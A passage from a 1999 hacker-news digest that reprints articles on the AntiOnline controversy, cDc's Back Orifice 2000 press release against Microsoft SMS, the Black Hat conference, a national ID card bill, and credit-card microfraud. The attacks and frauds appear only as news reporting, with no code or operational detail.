to be a strongly worded letter.

But Melvin, who did this week's package of stories on online
auctions, says it seems that even penny-ante crime is rare.
Less than 0.01 percent of the millions of eBay trades
produce fraud complaints to eBay itself, the site told the New
York Department of Consumer Affairs this year. That's fewer
than one in every 10,000 trades.

It sounds as if Diogenes should hang up his lamp and take
his search for an honest man online. Headline news: Internet
users don't cheat!

Let's not get carried away. Like the old bank robber Yellow
Kid Weil, today's electronic thieves probably still go "where
the money is" - and for all the millions of trades on eBay, the
take per trade is fairly low.

But while we can't proclaim an Age of Innocence on the
whole Internet, the low level of fraud at a big online
auctioneer like eBay underlines the point Melvin makes in
his report: If you've got anything you want to buy or sell, the
Internet is now the place to be.

Just watch out for uninvited Guests.

©1999 THE PLAIN DEALER. Used with permission

@HWA

15.0 AntiOnline Under Investigation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cult
An article in the Ottawa Citizen details recent claims
made by attrition.org about the activities and FBI
investigation of AntiOnline founder John Vranesevich.
Unfortunately this article has no comments from the
FBI. John Vranesevich refused to discuss the matter
with the reporter and is now threatening a lawsuit over
the article.

Ottawa Citizen
http://www.ottawacitizen.com/hightech/990719/2623591.html

Attrition.org- Negation
http://www.attrition.org/negation/ottawa.html

Late Update
The Ottawa Citizen has either pulled or moved the
above article. The folks at Attrition have been kind
enough to archive a copy for your reading pleasure.

Attrition.org - Spy vs Spy In Hacker Underworld
http://www.attrition.org/~jericho/media/ottawa_citizen.spy_vs_spy_in_hacker_underworld


http://www.ottawacitizen.com/hightech/990719/2623591.html

The Ottawa Citizen Online Business Page

Monday 19 July 1999

Spy vs. spy in the hacker underworld

Network security expert is under investigation for attacks on U.S. government Web sites

Bob Paquin
The Ottawa Citizen

In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys,
working for software or security firms, have occasionally been caught moonlighting as "black hat"
rogues.

Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated
hacker Web site AntiOnline. Mr. Vranesevich is currently under investigation by the FBI with regard
to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to
target high profile sites in order to scoop the rest of the media with exclusive reporting.

Mr. Vranesevich has denied the allegations.

Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site
(www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an
alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S.
Senate Web site hack earlier this month.

Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking
questionable AntiOnline reporting over the past year.

Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and
authoritative sources on hacking and security-related information.ÊBegun in late 1994 as a 5-megabyte
high school hobby Web site, AntiOnline has since grown into a multi-domain business venture.

ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking."ÊBesides reporting on
hacking news, the site offers a downloadable library of hacking software tools, archives of several
hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories.

While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly
built up a number of enemies among the hacker underground.

Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted
in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of
stance, distancing himself from the subjects he covers.

In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've
found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself
talking with people who have broken into hundreds of governmental servers, stolen sensitive data from
military sites, broken into atomic research centres, and yes, people who have even attempted to sell
data to individuals that presented themselves as being foreign terrorists É Many times, I knew about
these instances before hand, and could have stopped them."

He also claimed to have been secretly working with the U.S. Airforce to develop a "profile of a
hacker" for use in fighting "CyberCrime".

Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You
yell and scream about freedom of speech, yet you destroy sites which have information that disagree
with your opinions.ÊYou yell and scream about privacy, yet you install trojans into others' systems,
and read their personal email and files. You truly are hypocrites.ÊAll of these grand manifestos that
you develop are little more than excuses that you make up to justify your actions to yourself."

Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent
follow-on reporting in other media outlets, have been exaggerated and sensationalized.

"Not only had AntiOnline driven the media hype behind the stories, they put various government and
Department of Defense organizations on full alert preparing for the fallout these attacks would
cause," he states on his own Web site.

In detailing the relationship between Mr. Vranesevich and the alleged hacker in questions, Mr. Martin
notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may
have been responsible for creating some of the news to report on É he pays people to break into sites
in order to report on it as an exclusive."

@HWA

16.0 Parse Defcon Video Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan
Parse has posted several video clips of Defcon as well
as interviewers from some of the luminaries present.

Biztech TV
http://biztechtv.com/admin/parse/defcon.asp

@HWA

17.0 cDc Challenges Microsoft to Recall SMS (wicked!)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by omega
The cDc, writers of BO2K, have publicly challenged
Microsoft to voluntarily recall all copies of its Systems
Management Server network software and have
requested the AV industry to respond with signature
scanning for SMS files. The premise for this challenge is
that Microsoft has labeled Back Orifice 2000 a malicious
tool. cDc claims that if BO2K is malicious then SMS must
also be, by definition, malicious. Both programs do the
exact same thing and have almost identical feature
sets.

The Cult of the Dead Cow
http://www.cultdeadcow.com/news/pr19990719.html

______________________________________________________________________
_ _
BACK ORIFICE 2000 ((___)) BACK ORIFICE 2000
show some control [ x x ] show some control
\ /
(' ')
(U)

________________________ http://www.bo2k.com/ ________________________

FOR IMMEDIATE RELEASE
FOR IMMEDIATE RELEASE


Press Contact:
The Deth Vegetable
cDc Minister of Propaganda
veggie@cultdeadcow.com



DON'T WORRY WINDOWS USERS, EVERYTHING WILL BO2K

[July 19th, San Francisco] The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft Corporation to voluntarily recall
all copies of its Systems Management Server network software. In addition, cDc calls for the antivirus industry to respond
with signature scanning for SMS files.

"Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to Do-What-We-Say-Not-What-We-Do?

Microsoft evidently dislikes our new tool so much that they've taken to complaining about one of its key features. We're
talking about Back Orifice 2000, and the feature in question is its stealth mode.

Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their primary evidence is BO2K's stealth
feature, which gives you the option to run the server on the remote machine without it being evident to anybody sitting at
that machine.

In fact, here's what they're saying right now on the Microsoft Security Advisor website:

BO2K is a program that, when installed on a Windows computer, allows the computer to be remotely controlled by
another user. Remote control software is not malicious in and of itself; in fact, legitimate remote control
software packages are available for use by system administrators. What is different about BO2K is that it is
intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make
it difficult to detect.
http://www.microsoft.com/security/bulletins/bo2k.asp

Now, we concede that on its face, this sounds like a valid criticism. Being able to operate a remote admin tool without the
person at the other end knowing that it's running on the machine seems downright devious. (Keep in mind that BO2K's stealth
feature is an OPTION, which is in fact disabled by default.)

Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to brand it a hacker tool with no
redeeming social value.

But then, what are we to make of Systems Management Server (SMS)?

SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical stealth feature. As a matter of
fact, they explain this feature in a Word document available from the Microsoft website:

Security

Of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the
most "dangerous" in terms of security. Once an administrator is remote controlling a client, he has as many
rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of
carrying out a remote control session without the user at the client being aware of it. Thus, it is important to
understand the different security options available and also to understand the legal implications of using some
of them in certain jurisdictions."

Visible and Audible Indicators

It is possible to configure a remote control from a state where there is never any visible or audible indication
that a remote control session is under way. It has been made this flexible due to customer demands ranging from
one end of this spectrum to the other. When configuring the options available in the Remote Tools Client Agent
properties, due notice must also be taken of company policy and local laws about what level of unannounced and
unacknowledged intrusion is permitted."

http://www.microsoft.com/smsmgmt/techdetails/remote.asp

Notice that? Microsoft's own tool has the same evil capability as BO2K.

Now, Microsoft did not invent surreptitious desktop surveillance; there are other products on the market that perform these
functions. Microsoft is just the largest supplier of the technology, as SMS comes bundled with each copy of Back Office.

Why is it that Microsoft can offer a tool having this illegitimate functionality without any moral qualms, but when WE do
it, they throw a hissy fit? Well... we have a hunch.

"Microsoft wants to keep everybody talking about the evil software from us crazy computer hackers. So they paint BO2K as a
dangerous application with no constructive uses," says Reid Fleming (cDc). "We beg to differ."

BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing to categorize as such. So in order
to convince the public that BO2K is a solely destructive tool, Microsoft is forced to criticize the tool's feature set.
Evidently whoever dreamed up this press strategy was unaware of Systems Management Server and its stealth feature.

Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile, BO2K is free. (It's also open
source, and better constructed any way you measure it: size, efficiency, functionality, security.) Maybe this is just
another example of Microsoft's alleged anticompetitiveness?

"BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used either responsibly or irresponsibly,"
says Count Zero (cDc). "For Microsoft to claim that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has
nearly the same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it."

Regardless of their motivations, Microsoft is selling software which does many of same things as Back Orifice 2000,
including the pernicious ability to run hidden from the user. And if stealth mode is what makes BO2K a malicious program,
then Microsoft's Systems Management Server is a malicious program too.

Consequently, we challenge Microsoft to recall all copies of the SMS administration tool, because its featureset contains
stealth capability. This feature clearly illustrates that their software has no legitimate use. Furthermore, we urge all
antivirus vendors to include signatures for SMS in their scanner utilities.

Back Orifice 2000 is available for download free of charge from http://www.bo2k.com/.

..........................................................................

APPENDIX

Equally hypocritical quotes from Microsoft about Back Orifice:

"Users who are tricked into getting this thing installed on their system are vulnerable to the attacker, who can
then do anything that the victim can do -- move the mouse, open files, run programs, etc. -- which is little
different from what legitimate remote-control software can do. Back Orifice, however, is designed to be stealthy
and evade detection by the user."

"In fact, it really ends up doing bad things -- that’s what a Trojan horse does. Back Orifice falls into that
category because it is intentionally designed to hide itself from detection. The creators claim that this is a
useful administration tool, but it doesn’t even prompt people when it installs itself on the system. It doesn’t
warn them that it’s getting installed. And, once it’s installed, it makes the system available to other people on
the Internet. That is a malicious act."

"It’s incomprehensible why a tool like this would be created. [...] [T]here’s no purpose for this tool other than
harming actual users of software products."

-- Jason Garms, lead product manager for Windows NT security
Microsoft's prefabricated interview, 8-July-1999

..........................................................................

The CULT OF THE DEAD COW (cDc) is the most influential group of hackers in the world. Formed in 1984, the cDc has published
the longest running e-zine on the Internet, swallowed swords, made waffles, and so on.

For more background information, journalists are invited to check out our Medialist at
http://www.cultdeadcow.com/news/medialist.htm.

Cheerio.

"Microsoft", "Windows", "Systems Management Server", "Word", and "Back Office" are all trademarks of the Microsoft Corporation. Blah blah blah, this is giving me a
headache.

"cDc. It's alla'bout style, jackass."



@HWA


18.0 BlackHat Insiders Want to Quit Security Biz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
While Defcon made it into the popular press and
gathered all the attention The BlackHat Briefings is
where a lot of the security industry traded secrets.
Infoworld's Stuart McClure and Joel Scambray give a
pretty good overview of the goings on at the
conference and describe a growing sentiment within the
industry that you can't secure the world.

InfoWorld
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/29/o03-29.44.htm

July 19, 1999 (Vol. 21, Issue 29)

SECURITY WATCH


BY STUART McCLURE & JOEL SCAMBRAY
Black Hat conference survives a denial-of-service
attack, but will it outlast attrition?

The Security Watch team writes to you this week from the ever-expanding concrete facades of Las Vegas, where we were in attendance at the third annual Black
Hat Briefings USA conference from July 7 through July 8.

The original concept behind the Black Hat conference was to "meet the enemy," where corporate types could rub elbows with the glitterati of the hacker set,
including such notables as Simple Nomad of the Nomad Mobile Research Center (www.nmrc.org) and Dr. Mudge of L0pht (www.l0pht.com). The event has
evolved into a general meeting of the minds among security practitioners of all types, from public-sector managers to professional consultants.

Our feelings can best be summed up by the offhand comment of Windows NT security guru Dominique Brezinski, in his talk at the finale of the first day of
presentations: "My life is miserable and pathetic, and I want to get out of security soon."

Although the remark was mostly intended as a self-deprecating jest, it reflected the undercurrent of frustration that many speakers echoed throughout the conference:
Despite all of the work being done in the security field, the same old problems never seem to get solved. These recurring issues include the endemic lack of security
expertise in the market today, the Achilles' heel of poor password choices, and an ever-expanding list of commercial software bugs that are becoming impossible to
fix.

Despite the formidable intellectual talent assembled at Black Hat, the general response to some of these problems is to throw up the hands and say, "I give up." For
example, Brezinski gave a fascinating discussion of the implications of NT and Solaris' shared-code search path for creating a trusted forensic toolkit CD-ROM, but
he concluded his talk by noting that an attacker sophisticated enough to make kernel modifications would be impossible to defeat. Here are two other good
examples: Security legend Bill Cheswick's printed materials yawned that "this security stuff is all the same. ... From a security viewpoint, there is little new about the
Internet." And cryptography expert Bruce Schneier's ruminations included, "A secure computer is one that has been insured," which means you should get used to
the notion that your system will be compromised.

We can understand Cheswick's sentiments, because he has been one of the leading lights in security for the past 30 years, but it was a bit troubling to hear the "next
generation" of the security avant-garde openly proclaiming the need to seek more serene pastures.

Pessimism aside, there were still a great deal of interesting topics covered by the Black Hat speakers. Some highlights included Mudge's technical outline of L0pht's
new program, AntiSniff, which remotely detects promiscuous-mode network interfaces, and Simple Nomad's release of Pandora 4 with a functional version of its
NetWare Level 3 packet-signing exploit. Our company, Ernst & Young, gave a similar demonstration on NT of "passing the hash" to circumvent the NT
challenge/response log-on. The original idea for this type of attack was proposed on NTBugtraq years ago but was never publicly proved.

And despite the gloom expressed in some of their thoughts, all of the speakers showed great patience and perseverance during the incessant testing of the Venetian
hotel's fire-alarm system throughout the two-day conference. In the end, Black Hat's spirit proved resistant to this denial-of-service attempt.

Of course, a lot of the good information coming out of Black Hat doesn't appear in any official program but is gleaned in the corridors outside the conference hall
during breaks in the program.

We've done our best to capture the essence of Black Hat, but a lot of great dialogue was left on the cutting room floor. The next best thing to being there is
purchasing the full conference, including a video of the presentations in MP3 format, at www.blackhat.com. Meanwhile, send your thoughts on addressing security
symptoms vs. problems to security_watch@infoworld.com.

Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in
academic, corporate, and government environments for the past nine years.

Copyright (c) 1999 InfoWorld Media Group Inc.


@HWA

19.0 Attrition Closes Down Negation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Staff
The Attrition.org staff has decided to stop updating the
Negation section of their web site. The Negation section
covers the activity of John Vranesevich of AntiOnline.
The Attrition staff claim that they have accomplished
what they set out to do which was to prove beyond a
reasonable doubt that AntiOnline and John Vranesevich
are a fraud. The Attrition statement says that they
have also proven John Vranesevich guilty of libel,
repeated copyright violation, paying people to break into
systems, idle threats to stifle competition, and serious
errors in supposed "factual news". The Negation section
will remain posted for all to see, it will just no longer be
updated.

Negation
http://www.attrition.org/negation/

@HWA

20.0 ISS Offers Cracking Tools
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Just like any tool these have both good and bad uses.
ISS has announced three prototype tools, Telephony
Scanner, a wardailing program, Attacker Tracker, a log
file analysis tool, and SQL Cracker, for auditing SQL
passwords. Free demos are available.

ISS Protoworx
http://xforce.iss.net/protoworx/

@HWA

21.0 IBM Researching Proactive Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The proactive Security project at IBM is producing some
interesting results. There are white papers and demos
available. Definitely a site worth looking at.

IBM
http://www.hrl.il.ibm.com/proactive/ <- lots of interesting postscript papers here

22.0 InET Issue #3
~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by GothstaiN
Good news for the non-english crowd. InET Magazine
issue #3 has been released and it only comes in
Spanish.

Intrusos
http://www.intrusos.cjb.net

@HWA

23.0 National ID Card Law Set to be Enacted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Code Kid
In an effort to fight illegal immigration US Representative
Lamar Smith, from San Antonio, Texas, has proposed
that your social security number and possibly microchips
encoded with your fingerprints and other personal data
be a mandatory part of your drivers license. At a
hearing Thursday, the House Immigration subcommittee
will debate the future of modified driver licenses, which
has been labeled by some as a "national ID card."

Wired
http://www.wired.com/news/news/politics/story/20881.html

House Immigration subcommittee
http://www.house.gov/judiciary/sub106.htm

Your License or Your Life by Declan McCullagh

3:00 a.m. 22.Jul.99.PDT
WASHINGTON -- If Representative Lamar
Smith has his way, your driver's license
will soon sport your Social Security
number, whether you like it or not. It may
also include microchips encoded with your
fingerprints and other personal data.

Government agencies will no longer
accept as identification licenses that
don't meet the new standards.

Smith, a Republican from San Antonio, is
firmly convinced the new features will
reduce immigration. Not only is he
doggedly opposed to illegal immigration,
he wants to reduce legal immigration,
insisting that low-skilled workers compete
with US citizens for entry-level jobs.


See also: Your Driver License, For Sale?
http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/politics/story/20435.html

At a hearing Thursday, the House
Immigration subcommittee will debate the
future of modified driver licenses, which
detractors derisively call a "national ID
card."

Since Smith heads the subcommittee, his
opponents have had an uphill battle.
Making their fight even more difficult is
the fact that Congress approved the new
license rules in 1996. Civil liberties and
privacy groups are doggedly attempting
to repeal the law before it takes effect
next year.

So far, they've had little success. It's
true that in 1998 they managed to get
the Transportation Department to delay
following through on regulations for a
year. But that temporary setback expires
in October 1999. They had no luck in
inserting a flat-out repeal in a
transportation spending bill last month.

"We're urging Congress to reverse course
on national IDs," said Greg Nojeim,
legislative counsel for the American Civil
Liberties Union.

"Too many proposals to combat illegal
immigration instead limit the rights and
freedoms of Americans. We don't need a
national ID card to be the legacy of
efforts to keep undocumented people
from working."

The ACLU is part of a coalition with other
liberal groups, such as the Electronic
Frontier Foundation and Electronic
Privacy Information Center. But the
alliance also includes arch-conservative
organizations: the Eagle Forum, the Free
Congress Foundation, and Americans for
Tax Reform.

The organizations found common ground
in what they uniformly believe is a serious
threat to privacy. "Proposals for a
national ID have been consistently
rejected in the United States as an
infringement of personal liberty," said a
recent coalition letter urging Congress to
nix the current law.


"We care about this hearing because
there are other members that are
receptive to privacy concerns. While
Lamar Smith is on the other side, other
members need to hear what's going on,"
said Lori Cole, a spokesman for the Eagle
Forum's office in Washington.

For his part, Smi

  
th angrily denies that
he's Big Brother incarnate in a note he
posted on his Web site: "I do not support
a national ID card and don't know anyone
who does."


In response to the 1996 law that requires
"security features" in licenses, the
Department of Transportation in June
1998 proposed that states must encode
SSNs (and possibly digitized fingerprints)
onto drivers licenses.

After October 2000, the feds will require
these new licenses if people want to use
any government service, board an
airplane, be eligible for Medicare -- in
other words, live a normal life and do the
everyday things most Americans take for
granted.

The DOT will be allowed to proceed in
October 1999, unless Congress acts.

"The states are concerned that they will
be legally obligated to encode information
in drivers licenses and collect Social
Security numbers,"
says one Hill source.
The National Conference of State
Legislators and the National Association
of Counties have joined the coalition.

They sent a letter to House Speaker
Dennis Hastert on 30 June urging
Congress to repeal Section 656 of the
Illegal Immigration Reform and Immigrant
Responsibilities Act of 1996.

Another letter signed by six Congressmen
urges colleagues to support a repeal
measure -- the Privacy Protection Act --
introduced by Representative Ron Paul
(R-Texas).

@HWA

24.0 Local Agencies Not Concerned About Computer Intrusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Carole
A report released by the Emergency Response and
Research Institute paints a disturbing picture. The
report claims that many local, county and state
agencies have little or no fear of illegal data access.
While most respondents said that they have dealt with
Viruses, 30% claimed that computer tampering was of
little or no concern to them. Someone needs to wake
these people up.

Civic
http://www.civic.com/news/1999/july/civ-virus-7-21-99.html

Emergency Response and Research Institute
http://www.emergency.com/

Survey Finds Local Agencies Hit
Hard by Viruses; Not Worried
About Hacking

July 21, 1999

An overwhelming majority of local, county and state agencies have been the
victims of computer viruses, but few are worried about being hacked,
according to a recent survey by the Emergency Response and Research
Institute, a public safety consulting group.

The ERRI report found that nearly 83 percent of 175 agencies that
participated in the survey had dealt with a computer virus, indicating a
possible lack of effective anti-virus software in use or unsafe computing
practices by respondents.

Although 63 percent of the respondents called computer "hacking/cracking" a
problem, about one-third did not view the issue as a concern at all.

"This is the first survey that we know of its kind that contacted, city, county
and state agencies on this issue,"
said Clark L. Staten, executive director of
ERRI. "We would like to take it more in-depth and broaden it to be [more]
statistically significant.... It's a problem that is not receiving recognition."


ERRI analysts, who received the completed surveys during May and June,
also noted that more than 94 percent of those surveyed used a World Wide
Web site to communicate with the public. Far fewer (59 percent) reported
using e-mail to respond to public comments or complaints.

Staten would not name specific locations that participated because they had
been promised anonymity, but he said most of the respondents were
emergency agencies from municipalities across the United States, including fire
departments, university security departments, state emergency management
agencies and emergency medical services departments. Six agencies from
Canada also responded, he said.

ERRI, based in Chicago, was founded to provide solutions to the emergency
response and government community. More information is available at
www.emergency.com.

-- Dan Caterinicchia (danc@civic.com)

@HWA

25.0 Microfraud Becomes Big Deal
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/

contributed by Weld Pond
Still think the Internet is a safe place to conduct
business? Here is an eye opening article that takes a
look at what it calls 'microfraud'. Stealing a little money
from a lot of people. The idea has been around for years
but is only now coming to fruition with the unlimited
reach and anonymity of the internet.

Scientific American
http://www.sciam.com/1999/0899issue/0899cyber.html

HOW TO STEAL MILLIONS IN CHUMP CHANGE



It used to be a joke: a computer can make a mistake in a fraction of a second that would take an army of mathematicians working with pencil and paper
100 years to make. For 900,000 people whose credit cards apparently suffered fraudulent charges in a single computer-based scam, this old saw
morphed into an unpleasant reality. The Federal Trade Commission (FTC) is trying to recover as much as $45 million from a handful of people who used
modern technology to flood outdated security precautions. In late 1998 the group accounted for 4 percent of all the Visa chargebacks (in which a
merchant's account is debited for the amount of a transaction) in the world. Victims did not have to use their cards on the Web to be hit with charges.
They didn't even have to use their cards at all.

It would have taken about three years for a dishonest restaurant employee or store clerk working 24
hours a day just to fill out and submit the bogus transactions that FTC investigators ascribe to Kenneth
H. Taves, his wife, Teresa, and their associates. The group, they say, set up a series of companies that
processed Visa charges for adult Web sites and used the card numbers from those transactions plus
others made up by a simple computer program to charge people for services that never existed. (At
press time, Taves was in jail on contempt-of-court charges after disobeying an order to turn over
records and to repatriate about $6 million from accounts in the Cayman Islands. His trial is scheduled
for September 28.)

The essence of the scam was an updated version of the hoary computer-crime legend in which a
clever programmer siphons fractional pennies from millions of bank accounts and ends up rich with no
one the wiser. Here each fraudulent charge was typically $19.95, an amount unlikely to alarm a
harried consumer who might not remember every last purchase on a statement. The transactions also
clearly passed under the radar of Visa's fraud-detection algorithms. Although Visa and its member
banks have been notably silent about the role of their security measures in the debacle, sources
suggest that antifraud efforts have largely been geared to prevent smaller numbers of high-ticket thefts.

Indeed, the relatively small amount of each bill involved aggrieved customers in a financial catch-22: banks usually will go back only two months when
reversing disputed charges, but $38.90 is comfortably less than the $50 limit above which U.S. financial institutions are required by law to compensate
customers for fraudulent credit-card transactions. To make matters more difficult, Taves and his cohorts had an obvious excuse for disputed charges in
the nature of the product they were selling: it was only natural, they reportedly faxed at least one bank, that people would want to disavow subscriptions
to Web sites selling pornographic pictures.

Although it provided a convenient cover story, the porn connection may also have been Taves's undoing, says John G. Faughnan, a physician and
software developer whose Web page is the best source of information on the scam. Many of the more than 200 victims who contacted him found their
jobs or their marriages in jeopardy, so they had much more incentive to track down the perpetrator than just recovering the $20 to $100 they were
bilked out of. Faughnan acknowledges that his own attempts to navigate the financial bureaucracy and get a refund cost far more than the money lost.

Specific shortcomings in credit-card-processing procedures appear to have made this scam even more effective than it might otherwise have been. The
tricksters apparently concentrated their charges outside the U.S., where most banks do not verify the billing address--or in some cases even the
expiration date--of the card being charged. Because there was no shipping address involved, the recurring charges were generally treated like restaurant
or store transactions, in which a merchant has the buyer's card in hand and a signature on a charge slip. All the thieves needed was a valid number--not
even a name.

So what does this mean for the little slabs of plastic that make our lives so much more convenient? Although the wide availability of cheap processing
power has made the system vulnerable to unscrupulous merchants for a decade or more, it may be the advent of a huge array of intangible products for
sale, across an essentially untraceable network, that opens the floodgates of microfraud. A 20-seat restaurant or a tiny boutique that claimed $4 million a
month in business would be an obvious target for investigation. A digital storefront, in contrast, could house a dozen fast PCs delivering millions of dollars'
worth of products from a locked room the size of a journalist's office, or it could conceal a ring of high-tech bandits stealing just a little money from a lot
of people. Telling the difference between the two would require more scrutiny of both digital buyers and sellers, perhaps to the point of making
e-commerce less ravishingly attractive than it has lately become.

Furthermore, as long as a consumer's cost in time and money for reversing a fraudulent transaction exceeds the amount to be recovered, no one in the
chain of electronic commerce has a significant incentive to adopt measures (such as the long-stalled Secure Electronic Transaction standard or various
forms of digital cash) that would make such scams less likely. In fact, Faughnan points out, many sellers of digital content can profit from opening their
Web sites to users of false credit cards--even in the unlikely event of a chargeback, the marginal cost of the extra bits that were delivered is negligible.

Ultimately, technologists will undoubtedly introduce security countermeasures--perhaps in the form of the cryptography software that governments still
seem bent on keeping away from whoever hasn't gotten around to downloading it yet. In the meantime, the ability of individual victims (on the Internet, at
least) to alert thousands or millions of their peers seems to be the only game in town.


--Paul Wallich

@HWA

26.0 China Arrests One After Posting to Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
A Chinese engineer has been arrested on charges of
leaking state secrets after he posted secrets about a
new warplane to an Internet bulletin board. The
message he posted allegedly touched on secrets about
a new fighter plane that he learned about while working
at a research institute in the city of Chengdu.

Nando Times
http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html

Chinese engineer accused of posting security secrets online

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

BEIJING (July 21, 1999 1:04 p.m. EDT http://www.nandotimes.com) - A Chinese engineer has been
arrested on charges of posting secrets about a new warplane to an Internet bulletin board, a
newspaper reported Wednesday.

Authorities tracked down the engineer after the article posted in May spread to other Internet
sites, the state-run China Business Times reported.

The newspaper identified the engineer only by his surname, Guo.

The article he published allegedly touched on secrets about a new fighter plane that he
learned about while working at a research institute in the southwestern city of Chengdu, the
newspaper said.

The newspaper alleged that Guo posted the article to show off a specialist's knowledge of
military affairs.

Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state
secrets, the newspaper said.


@HWA

27.0 The Truth About Abe - MTV "Punk Hacker"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by tweety
Back in February HNN asked if anyone knew anything
about Abe, the "punk hacker". Well now we do. Salon
Magazine has posted a rather long expose on Abe's
exploits. The article describes how he used the original
Back Orifice to break into the producer's computers and
then used the information he found there to not only
get on the show but learn inside information about other
cast members. Evidently all it takes to be an MTV
'hacker' is to use Back Orifice.

Salon
http://www.salon.com/ent/feature/1999/07/21/mtv_hacker/index.html

HNN Archive for February 11, 1999
http://www.hackernews.com/arch.html?021199

{Hacking toward Bethlehem}



Abe Ingersoll, a former punk hacker
and infamous "Road Rules" cast member,
reflects on his ill-fated 15 minutes.

- - - - - - - - - - - -
By Jonathan Vankin

July 21, 1999 | Abe Ingersoll is not the type to hit a lady -- even
if she is kicking his ass on national television. So when a tiny
woman named Gladys smacked him with a roundhouse left hook,
Abe reacted stoically. The punch landed squarely on his jaw,
sending him sprawling. Gladys then pounced, raining blow after
blow on his back and shoulders. The entire beating unfolded
before rolling MTV video cameras, for later viewing by an
audience of millions. But Abe did nothing to defend himself other
than ball up and yell at her to knock it off.

Abe, a compact, spiffy-looking 18-year-old, was a cast member
of "Road Rules: Latin America" -- a 15-week-long installment of
MTV's peripatetic spinoff from the rusty but reliable documentary
show, "The Real World." (Abe's "Road Rules" episodes, which
first aired earlier this year, will likely be rerun in the fall.) When
the self-professed "punk hacker kid" decided to audition for the
show, it occurred to him that he might upgrade his odds of
making the cast by hacking into the network of the show's
production company, Bunim/Murray. He was right. Included in
his haul were transcripts of previous interviews with prospective
cast members, which gave him an inside track on what the
producers were looking for.

"Actually it's not even hacking because it's so straightforward,"
Abe tells me as we sit in his Venice, Calif., apartment, several
months after the fact. A well-scuffed surfboard leans against the
wall beside Abe's home-built, Linux-loaded PC. "They had this
information shared to the world. Anybody could just come and
find it. Cheap production company, cheap T-1 connecting a LAN
network to the Internet; what could possibly be at the other end
of that?"


A whole mess of trouble, as it turns out. In short, Abe uncovered
biographical insights on cast members from previous "Road
Rules"
excursions, several of whom dropped by for a
"spontaneous" on-air visit during the Latin America shoot. He
then used said info for nefarious purposes that inadvertently
aroused the wrath of Gladys. So she beat him up. All in all, a
pretty embarrassing 15 minutes of fame for a kid from Peoria.

For those not part of MTV's crucial yearning-adolescent
demographic, here's the high concept behind "Road Rules": Find
six attractive, outspoken, go-for-it young adults between the ages
of 18 and 24, set them up inside an RV, put them on the road in
an exotic locale, and then sit back and let the zaniness begin. It's
so stupid it's perfect. A camera crew and production staff follow
the young people around day and night, videotaping their every
nervous tic, angst-ridden confessional and shouting match.

Abe's hack was a classic case of the chickens coming home to
roost. Partners Jon Murray and Mary-Ellis Bunim's shows are
carefully stocked with sexy, flamboyant and ever-so-slightly
dysfunctional post-adolescents. The archetype is Puck from "The
Real World,"
an abrasive loudmouth whose temporary "family"
gave him the boot. The "Road Rules" producers knew they were
getting another bad-boy specimen with Abe -- they even labeled
him "The Bad Guy" in on-air promo spots -- but he turned out to
be more trouble than they'd counted on.

"We knew we were taking a certain risk in choosing someone like
Abe,"
says Murray, who learned of Abe's attack after the show
had wrapped. "To some extent, that's what Abe is about." "Abe
has tremendous charisma and he has unique experience,"
adds
